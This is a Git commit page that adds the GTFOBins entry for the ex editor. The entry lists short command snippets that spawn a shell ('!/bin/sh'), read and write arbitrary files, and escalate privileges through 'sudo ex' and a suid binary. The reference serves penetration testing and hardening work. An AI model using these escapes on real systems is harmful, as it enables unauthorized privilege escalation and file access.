1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00

New command: ex

This commit is contained in:
Emanuel Duss 2020-11-12 14:21:00 +01:00
parent ff997ac104
commit 324e0e672a

28
_gtfobins/ex.md Normal file
View File

@ -0,0 +1,28 @@
---
functions:
shell:
- code: |
ex
!/bin/sh
file-write:
- code: |
ex file_to_write
a
DATA
.
w
q
file-read:
- code: |
ex file_to_read
,p
q
sudo:
- code: |
sudo ex
!/bin/sh
limited-suid:
- code: |
./ex
!/bin/sh
---